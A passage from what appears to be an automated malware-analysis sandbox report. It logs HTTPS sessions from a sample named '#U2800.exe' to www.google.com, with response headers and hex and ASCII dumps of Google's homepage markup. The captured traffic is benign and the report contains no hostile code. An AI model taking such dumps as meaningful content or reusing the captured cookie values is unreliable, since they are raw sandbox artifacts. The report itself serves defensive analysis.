                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70
                                                                                                                                                                                                        Data Ascii: lt()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;p
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a
                                                                                                                                                                                                        Data Ascii: ght:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74
                                                                                                                                                                                                        Data Ascii: 1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbt
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29
                                                                                                                                                                                                        Data Ascii: x;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png)
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61
                                                                                                                                                                                                        Data Ascii: order-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-sha
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65
                                                                                                                                                                                                        Data Ascii: :#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-se


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        16192.168.2.449746142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1196INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QpPr3aRoD-oiQgy6viCOuQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-U2Su9LCYnW2QQTCVS6dkAqkHU__RWGY7nJaDipKjAJqYgwvUuSnMQ; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=nmpMRW9cOsHippjMwOrS84n47kMGuEEl66X1ALrG076mpWELPEAHyP5IULDLLMy5q3VY2TnWQ6_0zNS1jeqcbvbxL-eUMjS9MwMpHpbdRj5S8Ppl8B3-sqBlwnZAgmUGCeafCSsqP5TdBtreN2EVrxODZkJXdNgUHV77rYW_Xmgmbjub8Db6hwJq6oyIYNb6Elp94qctnM0vnRk; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC194INData Raw: 34 38 66 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61
                                                                                                                                                                                                        Data Ascii: 48f8<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google ha
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64
                                                                                                                                                                                                        Data Ascii: s many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_stand
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 38 2c 34 32 30 2c 32 33 31 2c 33 33 2c 32 33 2c 31 31 30 2c 35 31 34 2c 31 31 2c 31 37 39 31 2c 35 32 33 2c 35 33 2c 31 35 31 2c 32 37 35 2c 31 2c 38 35 2c 36 38 36 2c 32 2c 33 38 32 2c 32 2c 36 30 2c 31 39 31 2c 31 35 30 2c 32 30 38 2c 35 33 30 2c 32 35 34 2c 31 34 32 2c 36 30 32 2c 36 33 2c 31 39 31 2c 32 32 31 2c 36 38 34 2c 38 33 33 2c 32 35 38 2c 32 32 32 2c 34 35 36 2c 36 38 39 2c 31 34 37 39 2c 33 35 34 2c 33 30 37 2c 38 33 38 2c 31 37 2c 33 2c 34 34 38 2c 33 2c 33 35 30 2c 36 38 38 2c 31 30 36 39 2c 35 36 31 2c 33 35 31 2c 31 34 39 2c 32 2c 35 32 35 2c 31 36 35 2c 33 2c 34 31 38 2c 31 36 32 36 2c 31 2c 35 2c 34 2c 34 2c 34 2c 36 33 2c 37 37 2c 37 32 37 2c 36 34 37 2c 33 2c 32 31 32 2c 38 2c 34 39 39 2c 32 39 39 2c 33 34 32 2c 31 35 2c 31 2c 31 2c
                                                                                                                                                                                                        Data Ascii: 8,420,231,33,23,110,514,11,1791,523,53,151,275,1,85,686,2,382,2,60,191,150,208,530,254,142,602,63,191,221,684,833,258,222,456,689,1479,354,307,838,17,3,448,3,350,688,1069,561,351,149,2,525,165,3,418,1626,1,5,4,4,4,63,77,727,647,3,212,8,499,299,342,15,1,1,
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69
                                                                                                                                                                                                        Data Ascii: LEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===voi
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                                                                        Data Ascii: .preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63
                                                                                                                                                                                                        Data Ascii: ;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opac
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70
                                                                                                                                                                                                        Data Ascii: dding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f
                                                                                                                                                                                                        Data Ascii: ine-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65
                                                                                                                                                                                                        Data Ascii: :bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20
                                                                                                                                                                                                        Data Ascii: op:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        17192.168.2.449745142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-y6efxfUWkhaItnwYF5sHMQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-UmhCQVKZoApxO8tZKX0TF0uaYv8O9hNV1nsYYyL3rq34RZHvq7zss; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=hozGFdQA10JYZg-oNRZQpcxDDZwuWCwCoW9awieXwLCoJzbvle29XwoTVGz9HxbQdEpNtDL-5_GYx6rstmzXZcd1LgJ9RyJMzGIBb4em1nouMIF0HMXLS0dpIVKIWGIVKWEovvEimdEKQNsJKPKljY0dkSMmai_LtR_-BWXxEQ71KjGx4b7nPTFMR7vKXlldm6NCNTaS9JGxuF22cA; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
